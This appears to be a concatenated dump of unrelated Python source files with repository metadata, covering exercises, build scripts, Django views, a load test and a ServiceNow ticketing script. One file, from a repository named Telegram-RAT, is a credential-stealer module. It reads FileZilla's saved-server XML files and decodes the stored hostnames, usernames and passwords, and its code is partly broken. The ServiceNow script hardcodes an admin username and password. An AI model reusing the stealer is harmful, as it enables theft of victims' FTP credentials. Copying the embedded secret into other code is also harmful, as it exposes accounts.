| 27.657895 | 75 | 0.652712 | 145 | 1,051 | 4.213793 | 0.468966 | 0.05892 | 0.05892 | 0.05892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018079 | 0.157945 | 1,051 | 37 | 76 | 28.405405 | 0.672316 | 0.482398 | 0 | 0 | 0 | 0 | 0.050752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
337be1ea8a2157dad08a162f07bb9bd2265babca | 2,710 | py | Python | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import subprocess
import zipfile
"""
Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def get_special_paths(directory):
"""
Returns a list of the absolute paths of the special files in the given directory.
"special" file is one where the name contains the pattern __w__ somewhere,
where the w is one or more word chars.
"""
special_files = []
filenames = os.listdir(directory)
for filename in filenames:
special_file_match = re.search(r'__\w+__', filename)
if special_file_match:
special_files.append(os.path.abspath(os.path.join(directory, filename)))
return special_files
def copy_to(paths, directory):
"""
Copy all paths to given directory
"""
if not os.path.exists(directory):
os.mkdir(directory)
for path in paths:
shutil.copy(path, directory)
def zip_to(paths, zip_path):
"""
Add all files from given paths to zip file
"""
# REVIEW: did you mean: zipfile.ZipFile(zip_path, 'w')
with zipfile.ZipFile(zip_path, 'w') as zipf:
for path in paths:
zipf.write(path)
def zip_to_command(paths, zip_path):
"""
Add all files from given paths to zip file
"""
subprocess.run(['zip', '-j', zip_path] + paths)
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print("usage: [--todir dir][--tozip zipfile] dir [dir ...]")
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
to_dir = ''
if args[0] == '--todir':
to_dir = args[1]
del args[0:2]
to_zip = ''
if args[0] == '--tozip':
to_zip = args[1]
del args[0:2]
if len(args) == 0:
print("error: must specify one or more dirs")
sys.exit(1)
# +++your code here+++
# Call your functions
for directory in args:
paths = get_special_paths(directory)
if to_dir:
copy_to(paths, to_dir)
elif to_zip:
zip_to_command(paths, to_zip)
else:
print('\n'.join(paths))
if __name__ == "__main__":
main()
| 24.862385 | 85 | 0.627306 | 389 | 2,710 | 4.249357 | 0.362468 | 0.018149 | 0.018149 | 0.029038 | 0.099214 | 0.072595 | 0.055656 | 0.055656 | 0.055656 | 0.055656 | 0 | 0.0105 | 0.261993 | 2,710 | 108 | 86 | 25.092593 | 0.816 | 0.371956 | 0 | 0.117647 | 0 | 0 | 0.078135 | 0 | 0 | 0 | 0 | 0.018519 | 0 | 1 | 0.098039 | false | 0 | 0.117647 | 0 | 0.235294 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
337fb62497c441679efa5ff81eacc164419c490b | 458 | py | Python | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | 1 | 2017-05-02T21:28:02.000Z | 2017-05-02T21:28:02.000Z | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name="giraffe",
version="0.1",
package_dir={"giraffe" : ""},
packages=["giraffe"],
cmdclass = {'build_ext': build_ext},
ext_modules = [
Extension("graph", ["giraffe/graph.pyx"]),
Extension("graph_mixin", ["giraffe/graph_mixin.pyx"]),
]
)
| 28.625 | 75 | 0.576419 | 46 | 458 | 5.586957 | 0.478261 | 0.093385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006116 | 0.286026 | 458 | 15 | 76 | 30.533333 | 0.779817 | 0 | 0 | 0 | 0 | 0 | 0.194323 | 0.050218 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3383b63311713ea3400e46bf259718c4551057ed | 921 | py | Python | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | import click
from modules.processor import build_report, print_report
@click.group(invoke_without_command=True)
@click.option('--files', '-f', required=True, type=str, prompt="Provide the path to data files")
@click.pass_context
def cli_root(ctx, files):
ctx.meta['files'] = files
@cli_root.command()
@click.argument('name', type=str)
@click.pass_context
def driver(ctx, name):
files = ctx.meta['files']
report = build_report(files, driver=name)
print_report(report)
@cli_root.command()
@click.argument('order', type=click.Choice(["asc", "desc"]), default="asc")
@click.pass_context
def ls(ctx, order):
files = ctx.meta['files']
if order not in ("asc", "desc"):
raise IOError("'Wrong sorting direction")
report = build_report(files, order=order)
# добавить логинку того, что если нет error_log, то это это ошибка. подумать, куда добавть эту проверку
print_report(report)
| 29.709677 | 107 | 0.710098 | 132 | 921 | 4.840909 | 0.492424 | 0.051643 | 0.075117 | 0.089202 | 0.084507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145494 | 921 | 30 | 108 | 30.7 | 0.811944 | 0.109663 | 0 | 0.391304 | 0 | 0 | 0.127139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0.130435 | 0.086957 | 0 | 0.217391 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3385d0740834d136b94244297d0e01af822e4328 | 622 | py | Python | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
# Set fontsize larger for latex plots
matplotlib.rcParams.update({'font.size': 20})
# Generate data from file
x, y = np.genfromtxt("bin/python_Aufgabe2.txt", unpack=True)
m, n = x[-1], y[-1]
# Plotting
plt.figure(figsize=(12,7))
plt.grid()
plt.xlabel("x")
plt.ylabel("y")
x_new = np.linspace(min(x)-x[:-1].std()/2, max(x)+x[:-1].std()/2)
plt.plot(x[:-1], y[:-1], "x", mew=2., alpha=2, label="Datenpunkte")
plt.plot(x_new, m*x_new+n, "-", linewidth=3, label="Ausgleichsgerade")
plt.legend()
plt.tight_layout()
plt.savefig("bin/figure.pdf", dpi=1200)
| 27.043478 | 70 | 0.680064 | 110 | 622 | 3.8 | 0.572727 | 0.019139 | 0.014354 | 0.019139 | 0.033493 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037567 | 0.101286 | 622 | 22 | 71 | 28.272727 | 0.710197 | 0.109325 | 0 | 0 | 1 | 0 | 0.14 | 0.041818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3387d6dfab24bbf352088172ca1497dc6db9c9b1 | 712 | py | Python | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 38 | 2020-01-14T01:20:15.000Z | 2022-02-15T00:03:33.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 7 | 2020-01-13T18:08:07.000Z | 2022-01-13T02:20:30.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 1 | 2021-09-23T19:30:55.000Z | 2021-09-23T19:30:55.000Z |
from zipfile import ZipFile
import os
from version import VERSION
base_name = "GameCube File Tools"
base_name_with_version = base_name + " " + VERSION
import struct
if (struct.calcsize("P") * 8) == 64:
base_name_with_version += "_64bit"
base_zip_name = base_name_with_version
else:
base_name_with_version += "_32bit"
base_zip_name = base_name_with_version
zip_name = base_zip_name.replace(" ", "_") + ".zip"
exe_path = "./dist/%s.exe" % base_name_with_version
if not os.path.isfile(exe_path):
raise Exception("Executable not found: %s" % exe_path)
with ZipFile("./dist/" + zip_name, "w") as zip:
zip.write(exe_path, arcname="%s.exe" % base_name)
zip.write("README.md", arcname="README.txt")
| 26.37037 | 56 | 0.723315 | 110 | 712 | 4.354545 | 0.354545 | 0.150313 | 0.150313 | 0.237996 | 0.125261 | 0.125261 | 0.125261 | 0 | 0 | 0 | 0 | 0.011438 | 0.140449 | 712 | 26 | 57 | 27.384615 | 0.771242 | 0 | 0 | 0.105263 | 0 | 0 | 0.153305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.210526 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3388f9df9b80255086f1204a7c8b7e0f3646bb15 | 2,012 | py | Python | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null |
import json
import requests
import requests.utils
# Fixes some issues with TLS
import os
os.environ['REQUESTS_CA_BUNDLE'] = 'ca.pem';
# --- Debug Purposes Only, Server Config Is Hard Coded ---
#
#
# print "Debug ... " + deployed.ResultUri;
# response = requests.get('https://webhook.site/062e2ea7-5a36-4abb-a2c8-862dd85f777f')
# print response.status_code;
task = context.getTask()
# Debug
# print "Task info?"
# print str(task.getId());
# print str(task.getUsername());
# print str(task.getMetadata());
msg = "Message: " + str(task.getMetadata()['application']) + \
" (ver: " + str(task.getMetadata()['version']) + ") " + \
"is being deployed to: " + str(task.getMetadata()['environment']) + \
" by user: " + str(task.getUsername());
print msg;
# --- ServiceNow API ---
# per https://docs.servicenow.com/bundle/london-application-development/page/integrate/inbound-rest/concept/c_TableAPI.html
# Set the request parameters
url = 'https://dev58646.service-now.com/api/now/table/incident'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'admin'
pwd = 'dgZyGsSI6L7z'
# Set proper headers
headers = {"Content-Type":"application/json","Accept":"application/json"}
# Do the HTTP request
data = "{'short_description':'" + msg +"','urgency':'5','impact':'5'}"
response = requests.post(url, auth=(user, pwd), headers=headers ,data=data)
# Check for HTTP codes other than 200 and 201
if response.status_code != 200 and response.status_code != 201:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.json())
raise exception;
# Decode the JSON response into a dictionary and use the data
data = response.json()
# print(data)
# responseData = json.loads(data)
# print str(responseData.get('result').get('sys_id')); # Get sys_id
# --- End API ---
context.setAttribute('ticket_sys_id', str(data['result']['sys_id']))
print 'Storing attribute... sys_id: ' + context.getAttribute('ticket_sys_id');
print "Ticket opened.";
| 30.484848 | 123 | 0.695328 | 263 | 2,012 | 5.258555 | 0.501901 | 0.03543 | 0.052061 | 0.033261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022844 | 0.129722 | 2,012 | 65 | 124 | 30.953846 | 0.76699 | 0.423459 | 0 | 0 | 0 | 0 | 0.341571 | 0.045013 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
338af8622848bff11a1275eae70f3a73f237b0cc | 439 | py | Python | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | algoanim/stats.py | Gaming32/Python-AlgoAnim | c6df06e263f52d57ca91471830ff8fa14f1d85db | [
"MIT"
] | null | null | null | class Stats:
writes: int
reads: int
accesses: int
def __init__(self) -> None:
self.reset()
def reset(self) -> None:
self.writes = 0
self.reads = 0
self.accesses = 0
def add_reads(self, count: int = 1) -> None:
self.reads += count
self.accesses += count
def add_writes(self, count: int = 1) -> None:
self.writes += count
self.accesses += count
| 20.904762 | 49 | 0.542141 | 55 | 439 | 4.218182 | 0.272727 | 0.137931 | 0.103448 | 0.112069 | 0.181034 | 0.181034 | 0 | 0 | 0 | 0 | 0 | 0.017301 | 0.341686 | 439 | 20 | 50 | 21.95 | 0.785467 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
338bdb61b810291631438e77fffbc7457c38058b | 1,421 | py | Python | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 375 | 2020-03-17T06:20:50.000Z | 2022-03-29T22:27:23.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 44 | 2020-04-06T22:37:59.000Z | 2020-11-15T15:53:39.000Z | Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 53989b2509b1c844c6a33f670aece5f8dbf15305 | [
"MIT"
] | 173 | 2020-04-01T17:17:26.000Z | 2022-03-24T13:28:15.000Z | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': base64.b64decode(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server | 33.046512 | 148 | 0.696692 | 144 | 1,421 | 6.875 | 0.319444 | 0.193939 | 0.121212 | 0.028283 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0.567677 | 0 | 0.016639 | 0.154117 | 1,421 | 43 | 149 | 33.046512 | 0.806988 | 0.056298 | 0 | 0.428571 | 0 | 0 | 0.123552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0.071429 | 0.107143 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
338c3eed58a47fa30a2aa03ae3da78bb3efa67b1 | 535 | py | Python | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | oldcontrib/tools/gallery/urls.py | servee/django-servee-oldcontrib | 836447ebbd53db0b53879a35468c02e57f65105f | [
"BSD-Source-Code"
] | null | null | null | from django.conf.urls.defaults import *
urlpatterns = patterns('oldcontrib.tools.gallery.views',
url(r'^add_to_gallery/$', view='add_to_gallery', name='add_to_gallery'),
url(r'^remove_from_gallery/$', view='remove_from_gallery', name='remove_from_gallery'),
url(r'^create_gallery/$', view='create_gallery', name='create_gallery'),
url(r'^update_gallery_order/$', view='update_gallery_order', name='update_gallery_order'),
url(r'^change_gallery_title/$', view='change_gallery_title', name='change_gallery_title'),
) | 59.444444 | 94 | 0.745794 | 74 | 535 | 5.027027 | 0.324324 | 0.053763 | 0.096774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080374 | 535 | 9 | 95 | 59.444444 | 0.756098 | 0 | 0 | 0 | 0 | 0 | 0.570896 | 0.182836 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
339039daaf7ffa710ba3dbd6f69316cd722f2b38 | 843 | py | Python | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 39 | 2015-04-09T12:55:25.000Z | 2022-01-09T17:56:39.000Z | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | null | null | null | anymesh/tests/reactortester.py | AnyMesh/anyMesh-Python | 017b7808f2fbdc765604488d325678c28be438c0 | [
"MIT"
] | 13 | 2015-12-17T21:56:26.000Z | 2019-06-01T18:22:02.000Z | import unittest
from twisted.internet import reactor, task
class ReactorTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(ReactorTestCase, self).__init__(*args, **kwargs)
self.done = False
def timeOutAfter(self, seconds):
f = reactor.callLater(seconds, self.timedOut)
f.start(seconds)
def timedOut(self):
self.done = True
self.assertTrue(False, "test timed out!")
print "Test Timed Out!"
if reactor.running:
reactor.stop()
def reactorAssert(self, success, msg):
if not self.done:
self.assertTrue(success, msg)
def reactorTestComplete(self):
self.done = True
self.assertTrue(True, "test complete!")
print "Test Complete!"
if reactor.running:
reactor.stop()
| 28.1 | 62 | 0.619217 | 92 | 843 | 5.586957 | 0.423913 | 0.062257 | 0.046693 | 0.062257 | 0.22179 | 0.116732 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274021 | 843 | 29 | 63 | 29.068966 | 0.839869 | 0 | 0 | 0.25 | 0 | 0 | 0.068802 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | null | null | 0 | 0.083333 | null | null | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3397953b644d0f59b96f9efd7c056d0243abb45a | 380 | py | Python | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | src/run-shoutcloud/run-shoutcloud-aws.py | kpwbo/comparing-FaaS | dfede88cc9efb1a70ef96603e851436bdc177429 | [
"MIT"
] | null | null | null | from locust import HttpLocust, TaskSet, task
class WebsiteTasks(TaskSet):
@task
def bcrypt(self):
headers = { "Content-type": "application/json" }
payload = '{"message":"hello world"}'
self.client.post("/SHOUTCLOUD", payload, headers = headers)
class WebsiteUser(HttpLocust):
task_set = WebsiteTasks
min_wait = 1
max_wait = 1
| 27.142857 | 67 | 0.642105 | 41 | 380 | 5.878049 | 0.707317 | 0.091286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00692 | 0.239474 | 380 | 13 | 68 | 29.230769 | 0.82699 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3398cb226db154c17c5156d32cace490ac81678b | 198 | py | Python | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | 02_sequences/0201_listcomp/020103_cartesian/__main__.py | forseti/py-workout-01 | 9ebb36748ec7d4751b2c81086134df320c0f58ed | [
"Apache-2.0"
] | null | null | null | colors = ['black', 'white']
sizes = ['S', 'M', 'L']
tshirts = [
(color, size)
for color in colors
for size in sizes
]
print(f"Cartesian products from {colors} and {sizes}: {tshirts}")
| 18 | 65 | 0.59596 | 27 | 198 | 4.37037 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 198 | 10 | 66 | 19.8 | 0.766234 | 0 | 0 | 0 | 0 | 0 | 0.343434 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3399587139e4c6f0b9e4a5bc16f77ab6a41e223b | 807 | py | Python | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2019-01-17T21:03:51.000Z | 2019-01-17T21:03:51.000Z | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | software/pawsc/pawsc_blocks/PAWSC_REST_API_RICHARD_II/django/base/src/urls.py | vthakur7f/OpenCellular | 0d5d7b005327e4378bd5c7fd44d7b8dc5ab796f6 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | # create this file
# rerouting all requests that have ‘api’ in the url to the <code>apps.core.urls
from django.conf.urls import url
from django.urls import path
from rest_framework import routers
from base.src import views
from base.src.views import InitViewSet
#from base.src.views import UploadFileForm
#upload stuff
from django.conf import settings
from django.conf.urls.static import static
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
#router.register(r'titles', TitlesViewSet, base_name='titles')
urlpatterns = [
path(r'pawsc', InitViewSet.as_view()),
path(r'pawsc/upload', views.simple_upload, name='simple_upload'),
path(r'pawsc/home', views.home, name='home')
]
urlpatterns += router.urls
| 26.9 | 79 | 0.759603 | 116 | 807 | 5.241379 | 0.439655 | 0.065789 | 0.069079 | 0.059211 | 0.072368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130112 | 807 | 29 | 80 | 27.827586 | 0.866097 | 0.257745 | 0 | 0 | 0 | 0 | 0.092749 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4375 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
339e1f9b6047c43589a665151b5f5b6446ffe99f | 1,407 | py | Python | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.db.models import Q
import django_filters
from core.models import ApplicationVersionLicense as ImageVersionLicense
from api.v2.serializers.details import ImageVersionLicenseSerializer
from api.v2.views.base import AuthModelViewSet
class VersionFilter(django_filters.FilterSet):
version_id = django_filters.CharFilter(method='filter_by_uuid')
created_by = django_filters.CharFilter(method='filter_owner')
def filter_owner(self, queryset, name, value):
return queryset.filter(
Q(image_version__created_by__username=value) |
Q(image_version__application__created_by__username=value)
)
def filter_by_uuid(self, queryset, name, value):
# NOTE: Remove this *HACK* once django_filters supports UUID as PK fields
return queryset.filter(image_version__id=value)
class Meta:
model = ImageVersionLicense
fields = ['version_id', 'created_by']
class ImageVersionLicenseViewSet(AuthModelViewSet):
"""
API endpoint that allows version tags to be viewed
"""
queryset = ImageVersionLicense.objects.none()
serializer_class = ImageVersionLicenseSerializer
filter_class = VersionFilter
def get_queryset(self):
"""
Filter out tags for deleted versions
"""
return ImageVersionLicense.objects.filter(
image_version__created_by=self.request.user)
